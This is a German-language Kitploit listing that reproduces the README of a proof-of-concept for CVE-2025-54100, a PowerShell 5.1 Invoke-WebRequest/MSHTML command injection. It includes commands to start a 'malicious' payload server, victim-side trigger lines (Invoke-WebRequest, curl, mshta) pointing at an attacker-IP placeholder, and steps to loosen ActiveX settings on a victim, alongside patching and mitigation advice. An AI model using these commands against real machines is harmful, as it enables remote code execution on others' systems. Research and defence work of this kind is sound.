Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-54100 — CVE-2025-54100 (CVSS 7.8 Hoch) ist eine Command Injection-Schwachstelle im Invoke-WebRequest-Cmdlet von Windows PowerShell 5.1. Sie entsteht durch eine unzureichende Neutralisierung spezieller Elemente während der automatischen Analyse von Webantworten. | Kitploit
Tools/GitHubGitHub/themehackers/cve-2025-54100
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & Bildung
GitHubthemehackers/cve-2025-54100

CVE-2025-54100

CVE-2025-54100 (CVSS 7.8 Hoch) ist eine Command Injection-Schwachstelle im Invoke-WebRequest-Cmdlet von Windows PowerShell 5.1. Sie entsteht durch eine unzureichende Neutralisierung spezieller Elemente während der automatischen Analyse von Webantworten.

Repository anzeigen
317vor 8 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-54100 – PowerShell-Antwort-Parsing PoC

Ein prägnanter Proof-of-Concept, der zeigt, wie CVE-2025-54100 durch bösartiges HTML-Parsing zu einer Remote-Code-Ausführung (RCE) in Windows PowerShell 5.1 führen kann.

Inhaltsverzeichnis

  • Was ist CVE-2025-54100?
  • Wie der PoC funktioniert
  • Schnellstart
  • Auslösen von einem Opfer-Host aus
  • Fehlerbehebung und Überprüfung
  • Beweis
  • Gegenmaßnahmen
  • Haftungsausschluss
  • Referenzen

Was ist CVE-2025-54100?

  • Typ: Befehlseinschleusung in Invoke-WebRequest bei Nicht-Verwendung von -UseBasicParsing
  • Schweregrad: CVSS 7.8 (Hoch)
  • Grundursache: Das MSHTML-basierte Parsen von HTML-Antworten ermöglicht die Skriptausführung (z. B. ActiveXObject) im Kontext des Aufrufers.
  • Betroffen: Windows 10/11 und Windows Server 2008-2025 mit PowerShell 5.1.

Wie der PoC funktioniert

  1. Der FastAPI-Server in CVE-2025-54100.py stellt eine präparierte HTML-Nutzlast bereit.
  2. Die Nutzlast versucht, WScript.Shell / Shell.Application ActiveX-Objekte zu instanziieren.
  3. Auf anfälligen Hosts führt der MSHTML-Parser das Skript aus und demonstriert RCE durch Starten von calc.exe.
  4. Die bereitgestellte Nutzlast ist absichtlich minimal und nicht-destruktiv, kann aber für weitere Forschung modifiziert werden.

Schnellstart

Voraussetzungen

  • Python 3.10+ (getestet mit FastAPI & Uvicorn)
  • Abhängigkeiten installieren:
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    

Den bösartigen Server ausführen

Starten Sie den PoC-HTTP-Server:

root@kitploit:~
uvicorn app:app --host 0.0.0.0  --port 8888 --reload

Auslösen von einem Opfer-Host aus

Führen Sie diese auf einem anfälligen Windows-Rechner ohne -UseBasicParsing aus:

root@kitploit:~
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888

Verwenden Sie denselben Port, den Sie für den Server konfiguriert haben. Bei Anfälligkeit führt der MSHTML-Parser das eingebettete Skript aus. Einige AV-Produkte können das Verhalten blockieren, auch wenn das Parsing-Problem vorhanden ist.

Fehlerbehebung und Überprüfung

Falls calc.exe nicht erscheint:

  1. Öffnen Sie Internetoptionen auf dem Opfer.
  2. Gehen Sie zu Sicherheit → Anpassen der Stufe...
  3. Aktivieren Sie „ActiveX-Steuerelemente initialisieren und ausführen, die nicht als sicher für Scripting gekennzeichnet sind.“
  4. Führen Sie Invoke-WebRequest ohne -UseBasicParsing erneut aus.

Dies demonstriert den Ausführungsvektor. Echte Nutzlasten können Verschleierung oder zusätzliche Umgehungen verwenden, um die Standardeinschränkungen zu umgehen.

Beweis

PoC

Gegenmaßnahmen

Microsoft hat das Problem im Dezember 2025 gepatcht:

  1. Sicherheitsupdates anwenden auf betroffenen Windows-Hosts.
  2. Verwenden Sie -UseBasicParsing, um MSHTML-Parsing zu vermeiden:
    root@kitploit:~
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
    
  3. Wechseln Sie zu PowerShell 7+ (pwsh), das für das Parsing nicht auf MSHTML angewiesen ist.

Haftungsausschluss

[!WARNING] Nur für Bildungs- und autorisierte Tests. Verantwortungsvoll nutzen und alle geltenden Gesetze einhalten. Die Autoren haften nicht für Missbrauch oder Schäden.

Referenzen

  • NVD: CVE-2025-54100
  • MSRC: Update-Leitfaden
  • GitHub: osman1337-security/CVE-2025-54100
Tool herunterladen